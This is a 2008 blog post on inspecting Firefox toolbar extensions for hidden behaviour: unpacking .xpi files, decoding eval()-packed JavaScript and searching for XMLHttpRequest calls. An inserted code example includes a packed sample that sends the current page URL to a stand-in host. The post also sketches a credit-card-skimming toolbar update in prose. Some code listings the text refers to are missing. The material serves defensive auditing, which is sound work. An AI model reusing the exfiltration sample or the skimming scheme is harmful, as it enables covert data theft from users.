
Feb 04, 2008

Be Careful with Firefox Toolbars for SEO

Posted by Don in SEO tool automation

Do you look at the source code of Firefox Toolbars that you install?

Few people do. Most people assume that if a toolbar has been written about in the SEO community it must be OK. One such toolbar was making the rounds a few weeks ago. I'm not going to name names, but this article will take a look at a toolbar that is actually out there in the wild and that you may have downloaded.

Almost every SEO's computer that I've seen has about 30 Firefox extensions loaded. People write articles about how great extensions are, but nobody ever talks about the security ramifications. Nobody ever thinks about what is in their WordPress theme either.

A Very Dangerous Security Hole

A toolbar is an especially dangerous security hole if used for evil. JavaScript run from a web page is confined by the browser's security model, the same-origin policy in particular, but a toolbar is an extension, and extension code runs with the same privileges as the browser itself. Firefox protects you from cross-site scripting attacks; a toolbar is under no such restriction and can read from, and post to, any site on your behalf. A toolbar can also access your filesystem. For instance, it could save a binary to your machine without your knowledge. You need to be careful about what you're downloading.

Look Inside the Hole

First, how do you go about looking at the source code of a Firefox toolbar? It's actually quite easy. In Firefox, right-click the link to the toolbar and select "Save Link As..." so that the .xpi file is downloaded to your computer instead of installed. An .xpi is just a zip file, and you can open it with WinZip (or any other unzip tool) and take a look.

Is Peeking Allowed?

Isn't it a violation of the Terms of Service to look at the source code of a toolbar? If they've got a TOS that won't let you look at the toolbar code, I'd run for the hills; there's obviously something to hide. Is it protected by trade secret? The .xpi file is a well-known format, so it's no more protected than the HTML of a page you read in your browser. Claiming that it's a secret is like claiming a virus is protected by trade secret and you're not allowed to look for it. For the record, this particular toolbar didn't have a TOS. By downloading it, you're basically agreeing to let it do whatever it does.

Real Code, in the Wild

Let's take a look at the source code for this popular toolbar. It starts with something ominous:

eval() just tells JavaScript to take the string inside the parentheses and evaluate it as if it were straight source code. In this case, the toolbar author has decided to obfuscate the source code. (The author may call it encryption, but the decoding routine and everything it needs to run are right there in the file.) If you look in the .js file, you only see a bunch of gibberish, which the code converts back into actual source code and then executes. That's not a good sign. Why would the author shroud their code unless they feared you looking through it?

This type of obfuscation is easy enough to overcome. First, copy the code and run it through a code beautifier. This will output the code in an easily readable form. But it's still packed, so we'll just write a little code that looks something like:

This runs the packed code through their own decoding function, but instead of evaluating the result inside your browser, it merely writes the decoded source to the output stream. Now you can go looking for anything evil.
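As an added example (my own code, not the toolbar's and not the author's), here is that eval-hooking trick in Node.js, applied to a constructed packed sample in the style of the well-known p,a,c,k,e,r packer. The sample decodes to a script that reports the current page URL to a hypothetical host (example.invalid); nothing here touches the network. The second function does the search described in the next section: it looks through the recovered source for XMLHttpRequest use, open() calls with a literal method and URL, and any literal URLs.

```javascript
// Added example: recover eval()-packed extension code by shadowing eval,
// then search the result for network calls. Not the toolbar's own code.

// Constructed sample in the p,a,c,k,e,r style the article describes. It
// decodes to a script that sends the current page URL to a hypothetical
// host (example.invalid). Nothing here contacts the network.
const PACKED_SAMPLE = String.raw`eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0 1=2 3();1.4("5","6://7.8/9?a="+b.c.d);1.e();',15,15,'var|x|new|XMLHttpRequest|open|GET|http|example|invalid|ping|u|document|location|href|send'.split('|'),0,{}))`;

// Peel one or more eval() wrappers. Each layer is run with "eval" bound to a
// recorder instead of the real function, so the packer's decoder does its
// string work but the decoded script is captured rather than executed. Only
// text that still starts with eval( is run again; the final payload never is.
// The body runs as sloppy-mode code, where "eval" is a legal parameter name.
function unpackEvalLayers(source, maxLayers = 10) {
  const layers = [];
  let current = source;
  while (layers.length < maxLayers && /^\s*eval\s*\(/.test(current)) {
    const captured = [];
    const run = new Function('eval', current);
    run((code) => { captured.push(String(code)); });
    if (captured.length === 0) break;          // eval was never reached
    current = captured.join('\n');
    layers.push(current);
  }
  return layers;
}

// The search the next section describes: XMLHttpRequest use, open() calls
// with a literal method and URL prefix, and any literal http(s) URLs.
function findNetworkCalls(code) {
  const hits = [];
  if (/\bXMLHttpRequest\b/.test(code)) hits.push({ kind: 'xhr' });
  const openRe = /\.open\(\s*(['"])(\w+)\1\s*,\s*(['"])([^'"]*)\3/g;
  for (let m; (m = openRe.exec(code)) !== null;) {
    hits.push({ kind: 'open', method: m[2], url: m[4] });
  }
  const urlRe = /https?:\/\/[^\s'"]+/g;
  for (let m; (m = urlRe.exec(code)) !== null;) {
    hits.push({ kind: 'url', url: m[0] });
  }
  return hits;
}

// Stand-alone run: show each recovered layer and the network calls in the last.
const recovered = unpackEvalLayers(PACKED_SAMPLE);
recovered.forEach((layer, i) => console.log(`layer ${i + 1}:\n${layer}`));
console.log(findNetworkCalls(recovered[recovered.length - 1]));
```

Two caveats. The outer layer still executes (in a genuine packer it is only string manipulation, but it is untrusted code all the same), so do this in a throwaway virtual machine rather than your everyday browser or workstation; `new Function` is not a sandbox. And shadowing `eval` only catches code that reaches it by that name: a wrapper that goes through `window.eval`, `Function(...)`, or `setTimeout` with a string argument needs the same trick applied to those names.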

What Evil Lurks Here?

Generally, the evil things can be found by looking for XMLHttpRequest. That's what tells the browser to send data to another web server, which is how something can "phone home" or do things on your behalf. I didn't find anything especially evil in this toolbar, but I did find:

This code sends a URL to the Yahoo Site Explorer API to find its backlinks. There's nothing wrong with that, except that they're using "YahooDemo" as the application ID. That's a violation of Yahoo's TOS: you're supposed to apply for and use your own application ID.

The other TOS violation is almost amusing. They're calling Google to get the PageRank of a page, a clear violation of Google's TOS. Here's the code:

I can't see that the DoICare variable is used anywhere other than as an inside joke by the programmer. He knows he's violating Google's TOS by mining pagerank.

One last thing to note is that this toolbar attaches a function to the page-load event to check whether you're on their site. If you are, it does some extra calculations; this is how they add cool stuff to your viewing of their reports. That's all well and good, but it also adds the overhead of a function call for every page you ever load in your browser. Do this with 30 "free" extensions and pretty soon things start to slow down.

What, Me Worry?

Why should you care? At some point Google and Yahoo may get upset about the TOS violations. You're running the tool from your browser, so it's your IP address making the requests that violate their TOS, and they may very well just ban it. How much of a hassle would it be to get your IP banned? Was it really worth the time saved by using this toolbar? And wouldn't you rather know what it's doing on your behalf? And frankly, how hard would it be for Google and Yahoo to break this toolbar by changing the name of the demo key or the encoding of the PageRank check?

There's one last consideration in downloading a toolbar. Firefox has a handy service where an extension automatically checks whether a new version is available, and when you restart your browser it installs the new version for you. So how many times do you check for malicious code in a new version of a trusted friend?

If I were a Nigerian scammer or a Russian Mafioso, I'd write a toolbar that did something really cool and get thousands of people to download it. Perhaps I'd even replicate, for free, something that people currently pay for. The toolbar wouldn't do anything evil. I'd just bide my time while I built up a huge user base. Then I'd release a new version. That version would be a little improvement, but it would also add a function, attached to form submission, that runs a regular expression search for credit card information and sends it back to my server. Even if it were spotted quickly (and the chances are that it wouldn't be, because nobody looks at the code of upgrades), I'd still get enough fraudulent credit card numbers to retire on.

And if you got caught in that, it would be your own fault. You never looked.

